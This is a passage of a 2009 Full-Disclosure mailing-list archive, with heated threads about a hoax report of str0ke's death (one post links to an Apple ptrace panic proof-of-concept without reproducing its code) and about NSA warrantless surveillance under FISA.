Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <8656dcd50911040539r734857c8y2d667e7a50673413@mail.gmail.com>
Message-ID: <767504.40275.qm@web24206.mail.ird.yahoo.com>

It seems the whole thing was a Hoax rumor put about by people who I can only describe as pure evil. Glad to know he is fine. 

--- On Wed, 4/11/09, webDEViL <w3bd3vil at gmail.com> wrote:

> From: webDEViL <w3bd3vil at gmail.com>
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner" <wh1t3h4t3 at yahoo.co.uk>
> Cc: full-disclosure at lists.grok.org.uk
> Date: Wednesday, 4 November, 2009, 1:39 PM
> A very sad news indeed.
> 
> ?
> On Wed, Nov 4, 2009 at 6:49 PM,
> Micheal Turner <wh1t3h4t3 at yahoo.co.uk>
> wrote:
> 
> We are
> mourning a good friend today. I first begun talking to
> str0ke when I started publishing exploit codes onto this
> mailing list, he would always be polite and friendly in his
> emails. I got to know him over the years and am saddened by
> his departure, he contributed to the exploit scene and
> hacking subculture in a huge way. The last time I talked
> with him I asked him if I could interview him for my blog,
> he laughed and said he should be interviewing the exploit
> writers since he didnt do anything. That was str0ke and
> str0ke did alot, he always fought for the rights of the
> exploit developers and his website was the bread and butter
> of many a hackers day. He will sadly be missed by many
> people, hackers & friends.
> 
> 
> 
> At least now we can post exploits without that damn // milw0rm.com comment being
> added to the end!!! ;-) I joke, this code is dedicated to
> you str0ke. R.I.P my friend.
> 
> 
> 
> http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c
> 
> 
> 
> 
> 
> _______________________________________________
> 
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> 


      


From Valdis.Kletnieks at vt.edu  Wed Nov  4 22:36:12 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 04 Nov 2009 17:36:12 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: Your message of "Wed, 04 Nov 2009 14:08:59 CST."
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
Message-ID: <29243.1257374172@turing-police.cc.vt.edu>

On Wed, 04 Nov 2009 14:08:59 CST, Paul Schmehl said:
> Please cite one proven instance where surveillance was done on anyone without a
> FISA warrant - and lefty blogs filled with hyperbole don't count.

It's kind of hard to cite a "proven instance", because all the people who
tried were told to stuff it under the "state secrets" strategy:

http://www.ca9.uscourts.gov/ca9/newopinions.nsf/99D0C2963ED15AB288257394007C1F36/$file/0636083.pdf?openelement

I suppose a signed letter from the Attorney General saying "We won't do
this anymore because we now have a valid FISA warrant" isn't an admission
that the program *had* been doing it before.

http://graphics8.nytimes.com/packages/pdf/politics/20060117gonzales_Letter.pdf

And apparently, it *was* done, because:

"Q General Hayden, I know you're not going to talk about specifics about that,
and you say it's been successful. But would it have been as successful -- can
you unequivocally say that something has been stopped or there was an imminent
attack or you got information through this that you could not have gotten
through going to the court?

GENERAL HAYDEN: I can say unequivocally, all right, that we have got
information through this program that would not otherwise have been available.

Q Through the court? Because of the speed that you got it?

GENERAL HAYDEN: Yes, because of the speed, because of the procedures, because
of the processes and requirements set up in the FISA process, I can say
unequivocally that we have used this program in lieu of that and this program
has been successful."

http://georgewbush-whitehouse.archives.gov/news/releases/2005/12/print/20051219-1.html

So there you have it - the Attorney General and the Deputy Director of National
Intelligence saying flat out "We did this surveillance without a FISA warrant".

But I suppose they were both lying through their teeth, and it never happened,
and all this stuff on official White House letterhead is forged, and none of
them said it.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091104/207074be/attachment.bin 

From hawkgotyou at gmail.com  Wed Nov  4 22:29:05 2009
From: hawkgotyou at gmail.com (BlackHawk)
Date: Wed, 4 Nov 2009 23:29:05 +0100
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <767504.40275.qm@web24206.mail.ird.yahoo.com>
References: <8656dcd50911040539r734857c8y2d667e7a50673413@mail.gmail.com> 
	<767504.40275.qm@web24206.mail.ird.yahoo.com>
Message-ID: <621e1d10911041429j3d228275w3dc95ce00e4aad74@mail.gmail.com>

http://twitter.com/str0ke

It has happened for rgod an now with str0ke.. in both case they are
alive, and in both case there are idiots/trolls who claims the
opposite..


From frank2 at dc949.org  Wed Nov  4 23:08:02 2009
From: frank2 at dc949.org (frank^2)
Date: Wed, 4 Nov 2009 15:08:02 -0800
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <767504.40275.qm@web24206.mail.ird.yahoo.com>
References: <8656dcd50911040539r734857c8y2d667e7a50673413@mail.gmail.com>
	<767504.40275.qm@web24206.mail.ird.yahoo.com>
Message-ID: <8d79f4b50911041508y20328f20q7c17417bc4f6afd9@mail.gmail.com>

On Wed, Nov 4, 2009 at 1:58 PM, Micheal Turner <wh1t3h4t3 at yahoo.co.uk> wrote:
> It seems the whole thing was a Hoax rumor put about by people who I can only describe as pure evil. Glad to know he is fine.

What's "pure evil" about exploiting the ease by which one can spread
misinformation? If anything, it exposes how willing even a community
like this is to believe a single blogpost and spread it around without
truly confirming its origins.

I was trolled, I have lost. Feel free to admit it yourself instead of
calling this prank "pure evil."


From pschmehl_lists at tx.rr.com  Wed Nov  4 23:42:37 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 04 Nov 2009 17:42:37 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <29243.1257374172@turing-police.cc.vt.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>           
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
	<29243.1257374172@turing-police.cc.vt.edu>
Message-ID: <4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>

--On Wednesday, November 04, 2009 16:36:12 -0600 Valdis.Kletnieks at vt.edu wrote:

> On Wed, 04 Nov 2009 14:08:59 CST, Paul Schmehl said:
>> Please cite one proven instance where surveillance was done on anyone
>> without a FISA warrant - and lefty blogs filled with hyperbole don't count.
>
> It's kind of hard to cite a "proven instance", because all the people who
> tried were told to stuff it under the "state secrets" strategy:
>
> http://www.ca9.uscourts.gov/ca9/newopinions.nsf/99D0C2963ED15AB288257394007C1
> F36/$file/0636083.pdf?openelement
>
> I suppose a signed letter from the Attorney General saying "We won't do
> this anymore because we now have a valid FISA warrant" isn't an admission
> that the program *had* been doing it before.
>
> http://graphics8.nytimes.com/packages/pdf/politics/20060117gonzales_Letter.pdf
>
> And apparently, it *was* done, because:
>
> "Q General Hayden, I know you're not going to talk about specifics about that,
> and you say it's been successful. But would it have been as successful -- can
> you unequivocally say that something has been stopped or there was an imminent
> attack or you got information through this that you could not have gotten
> through going to the court?
>
> GENERAL HAYDEN: I can say unequivocally, all right, that we have got
> information through this program that would not otherwise have been available.
>
> Q Through the court? Because of the speed that you got it?
>
> GENERAL HAYDEN: Yes, because of the speed, because of the procedures, because
> of the processes and requirements set up in the FISA process, I can say
> unequivocally that we have used this program in lieu of that and this program
> has been successful."
>
> http://georgewbush-whitehouse.archives.gov/news/releases/2005/12/print/200512
> 19-1.html
>
> So there you have it - the Attorney General and the Deputy Director of
> National Intelligence saying flat out "We did this surveillance without a
> FISA warrant".
>
> But I suppose they were both lying through their teeth, and it never happened,
> and all this stuff on official White House letterhead is forged, and none of
> them said it.
>

No, they weren't lying through their teeth.  But you and millions of other 
people fail to grasp what they're saying.  The NSA is a *military* agency. 
It's charter allows it to do *military* surveillance.  The courts have always 
and routinely exempted that type of surveillance from the requirement of 
obtaining a warrant because it does not involve criminal justice actions 
against US citizens.  It involves surveillance of "foreign agents" (the legal 
term of art for spies) - persons working on behalf of the enemies of the US.

You and millions of others love to conflate those issues with warrantless 
surveillance of US citizens for the purpose of obtaining evidence in a criminal 
investigation and then scream bloody murder about warrantless surveillance and 
intrusions of our rights.

The latter is prohibited by law.  The former is permitted by law.  The purpose 
of the FISA law was to curtail the type of activity that the Nixon 
administration engaged in, namely the warrantless surveillance of US citizens 
for the purposes of obtaining evidence in a criminal investigation under the 
color of "national security", a perversion of the intent of the Constitution.

The courts have ruled that the primary purpose of the surveillance must be to 
"spy" on foreign enemies *and* their contacts within our borders.  So long as 
it complies with those strictures it is legal without a warrant, according to 
every court ruling that has ever been obtained on the matter.  When it involves 
a party within the US, a FISA warrant is required.  When it does not involve a 
party within the borders of the US, **even if it involves a US citizen (see 
Hamadi), no warrant is required (FISA or otherwise) nor has one ever been 
required.

And if you gave more than a second to the topic, you would readily see the 
stupidity of requiring the military to obtain a warrant to surveil the enemy in 
a time of war.

The NSA is not a law enforcement agency and cannot pursue legal action against 
US citizens.  That's the FBI's role.  There are laws that address what, if any, 
information that the NSA obtains may be turned over to the FBI.

You do realize that General Hayden was the director of the NSA when he made 
those statements, right?  And he was referring to a surveillance program that 
involved enemies of the US, even some of whom are US citizens?

That's a far cry from oh gee, they can snoop on my conversations any time they 
want to without going to the court first.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From wh1t3h4t3 at yahoo.co.uk  Thu Nov  5 00:13:49 2009
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Thu, 5 Nov 2009 00:13:49 +0000 (GMT)
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <8d79f4b50911041508y20328f20q7c17417bc4f6afd9@mail.gmail.com>
Message-ID: <35748.37093.qm@web24205.mail.ird.yahoo.com>

Its evil. Making people believe that someone is dead, publicly, and placing obituaries online shows no regard for the thoughts & feelings of the person being trolled or the others who may read them. 

In a community where whispers and hear-say can even get SANS to look for an OpenSSH 0day "doing-the-rounds", spreading 'misinformation' about a well-liked individual who worked on a project for the community is unpleasant - making out they are dead is just horrible.

There are people at the end of the computers. Don't ever forget it.

--- On Wed, 4/11/09, frank^2 <frank2 at dc949.org> wrote:

> From: frank^2 <frank2 at dc949.org>
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner" <wh1t3h4t3 at yahoo.co.uk>
> Cc: full-disclosure at lists.grok.org.uk
> Date: Wednesday, 4 November, 2009, 11:08 PM
> On Wed, Nov 4, 2009 at 1:58 PM,
> Micheal Turner <wh1t3h4t3 at yahoo.co.uk>
> wrote:
> > It seems the whole thing was a Hoax rumor put about by
> people who I can only describe as pure evil. Glad to know he
> is fine.
> 
> What's "pure evil" about exploiting the ease by which one
> can spread
> misinformation? If anything, it exposes how willing even a
> community
> like this is to believe a single blogpost and spread it
> around without
> truly confirming its origins.
> 
> I was trolled, I have lost. Feel free to admit it yourself
> instead of
> calling this prank "pure evil."
> 


      


From frank2 at dc949.org  Thu Nov  5 00:50:34 2009
From: frank2 at dc949.org (frank^2)
Date: Wed, 4 Nov 2009 16:50:34 -0800
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <35748.37093.qm@web24205.mail.ird.yahoo.com>
References: <8d79f4b50911041508y20328f20q7c17417bc4f6afd9@mail.gmail.com>
	<35748.37093.qm@web24205.mail.ird.yahoo.com>
Message-ID: <8d79f4b50911041650t773d0510jb5f211f4824d65dd@mail.gmail.com>

On Wed, Nov 4, 2009 at 4:13 PM, Micheal Turner <wh1t3h4t3 at yahoo.co.uk> wrote:
> Its evil. Making people believe that someone is dead, publicly, and placing obituaries online shows no regard for the thoughts & feelings of the person being trolled or the others who may read them.
>
> In a community where whispers and hear-say can even get SANS to look for an OpenSSH 0day "doing-the-rounds", spreading 'misinformation' about a well-liked individual who worked on a project for the community is unpleasant - making out they are dead is just horrible.
>
> There are people at the end of the computers. Don't ever forget it.
>

This is kind of a silly tangent to be having an argument about on this
list, so I'll try to make this my last comment on the matter.

It may be a little semantic, but I feel you're confusing wickedness
with a lack of empathy. Evil implies that the intent behind the prank
was to cause emotional harm. It's certainly detestable that the prank
was based in making people assume that str0ke was dead, but I'm
doubtful that the purpose of its spread was to cause harm. I hate to
be That Guy That Explains The Joke, but I'm pretty sure the purpose
was to mock the fact that a) str0ke has been quiet for a long while
publicly and b) milw0rm hasn't been updated for a lengthy period of
time for yet-to-be explained reasons. (I think v3n0m piped in a while
back and said they were taking care of the backlog, but that's about
all I remember.)

While the line between apathy towards others' emotions and intent to
truly cause harm to one's emotions can be blurred, I don't think it's
particularly fair to call the perpetrators of this prank evil. "Evil"
is taking joy in the suffering of others. The intent of trolling is to
get a specific reaction from a crafted falsehood or comment-- it
doesn't necessarily follow that the expected reaction here was
emotional harm. So given the circumstances, I feel it's more accurate
to say they just simply didn't care.


From wh1t3h4t3 at yahoo.co.uk  Thu Nov  5 01:07:07 2009
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Thu, 5 Nov 2009 01:07:07 +0000 (GMT)
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <8d79f4b50911041650t773d0510jb5f211f4824d65dd@mail.gmail.com>
Message-ID: <290144.63788.qm@web24205.mail.ird.yahoo.com>

Did you and them get your degree from the same university of trolls?

I have mistaken nothing for nothing. Fuck you. 

--- On Thu, 5/11/09, frank^2 <frank2 at dc949.org> wrote:

> From: frank^2 <frank2 at dc949.org>
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner" <wh1t3h4t3 at yahoo.co.uk>
> Cc: full-disclosure at lists.grok.org.uk
> Date: Thursday, 5 November, 2009, 12:50 AM
> On Wed, Nov 4, 2009 at 4:13 PM,
> Micheal Turner <wh1t3h4t3 at yahoo.co.uk>
> wrote:
> > Its evil. Making people believe that someone is dead,
> publicly, and placing obituaries online shows no regard for
> the thoughts & feelings of the person being trolled or
> the others who may read them.
> >
> > In a community where whispers and hear-say can even
> get SANS to look for an OpenSSH 0day "doing-the-rounds",
> spreading 'misinformation' about a well-liked individual who
> worked on a project for the community is unpleasant - making
> out they are dead is just horrible.
> >
> > There are people at the end of the computers. Don't
> ever forget it.
> >
> 
> This is kind of a silly tangent to be having an argument
> about on this
> list, so I'll try to make this my last comment on the
> matter.
> 
> It may be a little semantic, but I feel you're confusing
> wickedness
> with a lack of empathy. Evil implies that the intent behind
> the prank
> was to cause emotional harm. It's certainly detestable that
> the prank
> was based in making people assume that str0ke was dead, but
> I'm
> doubtful that the purpose of its spread was to cause harm.
> I hate to
> be That Guy That Explains The Joke, but I'm pretty sure the
> purpose
> was to mock the fact that a) str0ke has been quiet for a
> long while
> publicly and b) milw0rm hasn't been updated for a lengthy
> period of
> time for yet-to-be explained reasons. (I think v3n0m piped
> in a while
> back and said they were taking care of the backlog, but
> that's about
> all I remember.)
> 
> While the line between apathy towards others' emotions and
> intent to
> truly cause harm to one's emotions can be blurred, I don't
> think it's
> particularly fair to call the perpetrators of this prank
> evil. "Evil"
> is taking joy in the suffering of others. The intent of
> trolling is to
> get a specific reaction from a crafted falsehood or
> comment-- it
> doesn't necessarily follow that the expected reaction here
> was
> emotional harm. So given the circumstances, I feel it's
> more accurate
> to say they just simply didn't care.
> 


      


From mrx at propergander.org.uk  Thu Nov  5 01:21:15 2009
From: mrx at propergander.org.uk (mrx)
Date: Thu, 05 Nov 2009 01:21:15 +0000
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>	<16583.1257310348@turing-police.cc.vt.edu>	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>	<29243.1257374172@turing-police.cc.vt.edu>
	<4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>
Message-ID: <4AF2288B.3000303@propergander.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Paul Schmehl wrote:
> --On Wednesday, November 04, 2009 16:36:12 -0600 Valdis.Kletnieks at vt.edu wrote:
> 
>> On Wed, 04 Nov 2009 14:08:59 CST, Paul Schmehl said:
>>> Please cite one proven instance where surveillance was done on anyone
>>> without a FISA warrant - and lefty blogs filled with hyperbole don't count.
>> It's kind of hard to cite a "proven instance", because all the people who
>> tried were told to stuff it under the "state secrets" strategy:
>>
>> http://www.ca9.uscourts.gov/ca9/newopinions.nsf/99D0C2963ED15AB288257394007C1
>> F36/$file/0636083.pdf?openelement
>>
>> I suppose a signed letter from the Attorney General saying "We won't do
>> this anymore because we now have a valid FISA warrant" isn't an admission
>> that the program *had* been doing it before.
>>
>> http://graphics8.nytimes.com/packages/pdf/politics/20060117gonzales_Letter.pdf
>>
>> And apparently, it *was* done, because:
>>
>> "Q General Hayden, I know you're not going to talk about specifics about that,
>> and you say it's been successful. But would it have been as successful -- can
>> you unequivocally say that something has been stopped or there was an imminent
>> attack or you got information through this that you could not have gotten
>> through going to the court?
>>
>> GENERAL HAYDEN: I can say unequivocally, all right, that we have got
>> information through this program that would not otherwise have been available.
>>
>> Q Through the court? Because of the speed that you got it?
>>
>> GENERAL HAYDEN: Yes, because of the speed, because of the procedures, because
>> of the processes and requirements set up in the FISA process, I can say
>> unequivocally that we have used this program in lieu of that and this program
>> has been successful."
>>
>> http://georgewbush-whitehouse.archives.gov/news/releases/2005/12/print/200512
>> 19-1.html
>>
>> So there you have it - the Attorney General and the Deputy Director of
>> National Intelligence saying flat out "We did this surveillance without a
>> FISA warrant".
>>
>> But I suppose they were both lying through their teeth, and it never happened,
>> and all this stuff on official White House letterhead is forged, and none of
>> them said it.
>>
> 
> No, they weren't lying through their teeth.  But you and millions of other 
> people fail to grasp what they're saying.  The NSA is a *military* agency. 
> It's charter allows it to do *military* surveillance.  The courts have always 
> and routinely exempted that type of surveillance from the requirement of 
> obtaining a warrant because it does not involve criminal justice actions 
> against US citizens.  It involves surveillance of "foreign agents" (the legal 
> term of art for spies) - persons working on behalf of the enemies of the US.
> 
> You and millions of others love to conflate those issues with warrantless 
> surveillance of US citizens for the purpose of obtaining evidence in a criminal 
> investigation and then scream bloody murder about warrantless surveillance and 
> intrusions of our rights.
> 
> The latter is prohibited by law.  The former is permitted by law.  The purpose 
> of the FISA law was to curtail the type of activity that the Nixon 
> administration engaged in, namely the warrantless surveillance of US citizens 
> for the purposes of obtaining evidence in a criminal investigation under the 
> color of "national security", a perversion of the intent of the Constitution.
> 
> The courts have ruled that the primary purpose of the surveillance must be to 
> "spy" on foreign enemies *and* their contacts within our borders.  So long as 
> it complies with those strictures it is legal without a warrant, according to 
> every court ruling that has ever been obtained on the matter.  When it involves 
> a party within the US, a FISA warrant is required.  When it does not involve a 
> party within the borders of the US, **even if it involves a US citizen (see 
> Hamadi), no warrant is required (FISA or otherwise) nor has one ever been 
> required.
> 
> And if you gave more than a second to the topic, you would readily see the 
> stupidity of requiring the military to obtain a warrant to surveil the enemy in 
> a time of war.
> 
> The NSA is not a law enforcement agency and cannot pursue legal action against 
> US citizens.  That's the FBI's role.  There are laws that address what, if any, 
> information that the NSA obtains may be turned over to the FBI.
> 
> You do realize that General Hayden was the director of the NSA when he made 
> those statements, right?  And he was referring to a surveillance program that 
> involved enemies of the US, even some of whom are US citizens?
> 
> That's a far cry from oh gee, they can snoop on my conversations any time they 
> want to without going to the court first.
> 
This snooping on US citizens via illegal wire taps could be tested. Appear to plan a terrorist outrage, engage in telephone conversations
regarding the planting of bombs in shopping malls or the detonation of a fuel tanker at a large sports event. Then sit back an wait for the FBI,
CIA or other law enforcement agency to kick in your door. Of course it could be that monitoring systems currently in place are
searching/listening for certain keywords and once flagged a warrant is then applied for. But whatever the case, if an armed response team kick
down your door at 4:00am, you can be sure your telephone conversations were monitored.

I am personally of the opinion that the law only applies to those that are caught if they are a criminal, and cannot be covered up if they are a
law enforcement officer.

regards
mrx.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBSvIoi7Ivn8UFHWSmAQKX/ggAoW5NYV57qJ7rdaKiWtYdwCBd2+sf2K8k
7F2UeAnxOifA1J6fxcXGp+AuE6GemMXrj9ysMltVzbJUI/9DBz3/+m925vNNdW/2
GWEoBfO/EB6Am/YSKHcbn39PhYemOiG7auEVOZHmkw89OWO8QIWdsHY2csHpENX7
kOtf2U33G+tbyGibwDUOZ23hs4o/77mX32eF12qmYznEdRb19Tl8JZKt8KXsw84x
ijV3SwIWpmw8WxPvFz2H+8aUrB+jtBtaFDXuK9Hbg39temJOm2mJjBt1oDGdjGXw
Ma1OtXleeTyBxsL0GnQ15BIBgnYosWvj2EyvToVpaCD1SO3mN/dJsg==
=8ox0
-----END PGP SIGNATURE-----


From gem at rellim.com  Thu Nov  5 02:03:10 2009
From: gem at rellim.com (Gary E. Miller)
Date: Wed, 4 Nov 2009 18:03:10 -0800 (PST)
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu> 
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
Message-ID: <alpine.LNX.1.10.0911041801170.14157@catbert.rellim.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yo Paul!

On Wed, 4 Nov 2009, Paul Schmehl wrote:

> Please cite one proven instance where surveillance was done on anyone without a
> FISA warrant - and lefty blogs filled with hyperbole don't count.

Jewel v. NSA

RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
	gem at rellim.com  Tel:+1(541)382-8588

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFK8jJgBmnRqz71OvMRAu+8AKDVUJae2FVyT6uZiub6sJq57IsTFQCfb7RO
KI1q3e1eYLqF++J/YEImWZY=
=R+IU
-----END PGP SIGNATURE-----


From Valdis.Kletnieks at vt.edu  Thu Nov  5 02:48:41 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 04 Nov 2009 21:48:41 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: Your message of "Wed, 04 Nov 2009 17:42:37 CST."
	<4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
	<29243.1257374172@turing-police.cc.vt.edu>
	<4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>
Message-ID: <6583.1257389321@turing-police.cc.vt.edu>

On Wed, 04 Nov 2009 17:42:37 CST, Paul Schmehl said:
> You and millions of others love to conflate those issues with warrantless
> surveillance of US citizens for the purpose of obtaining evidence in a criminal
> investigation and then scream bloody murder about warrantless surveillance and
> intrusions of our rights.

OK, so in your opinion we should sit back and accept the legal theory that "I'm
the President, and as Commander in Chief I can give orders contrary to the
usual 4th Amendment restrictions" (note carefully that there was *NOT* an
actual formal declaration of war made - Congress merely authorized the use of
force. Many constitutional law experts seem to think this makes a difference).

So it is OK if as President, he decides to suspend habeus corpus?

If it's *not* OK, how do you intend to complain once your corpus can't
be habeased any more?

"The price of freedom is eternal vigilance" -- Thomas Jefferson.

In other words, the time to raise a fuss is *before* they go down the
slippery slope, not once they're 3/4 of the way down and in an uncontrolled
slide.

"When fascism comes to America, it will be wrapped in a flag and carrying a
cross." -- Sinclair Lewis, 1935

And that's why we raise a fuss.  You may wish to read Naomi Wolf's "Fascist
America in 10 easy steps":

http://www.guardian.co.uk/world/2007/apr/24/usa.comment

And that's why we raise a fuss.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091104/2c91b54d/attachment.bin 

From ivanhec at gmail.com  Thu Nov  5 03:04:41 2009
From: ivanhec at gmail.com (Ivan .)
Date: Thu, 5 Nov 2009 14:04:41 +1100
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6583.1257389321@turing-police.cc.vt.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
	<EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>
	<29243.1257374172@turing-police.cc.vt.edu>
	<4CA79DCF9285D97618CFF20F@utd65257.utdallas.edu>
	<6583.1257389321@turing-police.cc.vt.edu>
Message-ID: <6450e99d0911041904y2a845f3dj5d2844fb2b2b86e2@mail.gmail.com>

http://www.youtube.com/watch?v=WourPs56Shc

On Thu, Nov 5, 2009 at 1:48 PM, <Valdis.Kletnieks at vt.edu> wrote:

> On Wed, 04 Nov 2009 17:42:37 CST, Paul Schmehl said:
> > You and millions of others love to conflate those issues with warrantless
> > surveillance of US citizens for the purpose of obtaining evidence in a
> criminal
> > investigation and then scream bloody murder about warrantless
> surveillance and
> > intrusions of our rights.
>
> OK, so in your opinion we should sit back and accept the legal theory that
> "I'm
> the President, and as Commander in Chief I can give orders contrary to the
> usual 4th Amendment restrictions" (note carefully that there was *NOT* an
> actual formal declaration of war made - Congress merely authorized the use
> of
> force. Many constitutional law experts seem to think this makes a
> difference).
>
> So it is OK if as President, he decides to suspend habeus corpus?
>
> If it's *not* OK, how do you intend to complain once your corpus can't
> be habeased any more?
>
> "The price of freedom is eternal vigilance" -- Thomas Jefferson.
>
> In other words, the time to raise a fuss is *before* they go down the
> slippery slope, not once they're 3/4 of the way down and in an uncontrolled
> slide.
>
> "When fascism comes to America, it will be wrapped in a flag and carrying a
> cross." -- Sinclair Lewis, 1935
>
> And that's why we raise a fuss.  You may wish to read Naomi Wolf's "Fascist
> America in 10 easy steps":
>
> http://www.guardian.co.uk/world/2007/apr/24/usa.comment
>
> And that's why we raise a fuss.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/e1f7afd6/attachment.html 

From vpn.1.fanatic at gmail.com  Thu Nov  5 03:17:22 2009
From: vpn.1.fanatic at gmail.com (Jubei Trippataka)
Date: Thu, 5 Nov 2009 14:17:22 +1100
Subject: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
In-Reply-To: <290144.63788.qm@web24205.mail.ird.yahoo.com>
References: <8d79f4b50911041650t773d0510jb5f211f4824d65dd@mail.gmail.com>
	<290144.63788.qm@web24205.mail.ird.yahoo.com>
Message-ID: <1c27cb9a0911041917w447d07adk1b64965df5edc669@mail.gmail.com>

"There are people at the end of the computers. Don't ever forget it."

Did you and them get your degree from the same university of trolls?
>
> I have mistaken nothing for nothing. Fuck you.
>
>
Regardless, you should have known he wasn't dead. Your tongue is so far up
his ass didn't you feel he was still at 37c ?

You remind me of: LEAVE BRITNEY ALONE!!!!

-- 
ciao

JT
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091105/3c0e254a/attachment.html 

From pschmehl_lists at tx.rr.com  Thu Nov  5 03:17:52 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
